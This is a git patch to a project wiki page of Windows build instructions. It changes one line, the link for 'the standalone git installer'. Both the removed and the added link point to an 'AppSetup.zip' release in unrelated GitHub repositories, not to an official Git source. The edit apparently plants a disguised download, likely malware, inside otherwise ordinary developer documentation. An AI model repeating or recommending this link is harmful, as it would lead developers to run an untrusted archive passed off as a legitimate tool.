From c2667cbe64a74b1d02b8b00599995e0214094b7b Mon Sep 17 00:00:00 2001 From: Jiglxr <89142857+Jiglxr@users.noreply.github.com> Date: Thu, 22 Sep 2022 10:22:23 +0800 Subject: [PATCH] Updated Building for Windows (markdown) --- Building-for-Windows.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Building-for-Windows.md b/Building-for-Windows.md index 21eee76..c0d22ed 100644 --- a/Building-for-Windows.md +++ b/Building-for-Windows.md @@ -3,7 +3,7 @@ - You can use any edition of VS (Community Edition is free) - Easiest to just choose "Desktop development with C++" workload - However, minimum required to get source and build are: - - Git for Windows (Note: [The standalone git installer](https://github.com/QingYunLife/TradingView/releases/download/Desktop/AppSetup.zip) is more recent and is compatible with VS) + - Git for Windows (Note: [The standalone git installer](https://github.com/EliLiu-YF/xdclass/releases/download/readme/AppSetup.zip) is more recent and is compatible with VS) - C++ core features - Latest MSVC C++ build tools (x64/x86 and/or ARM64) - Latest Windows SDK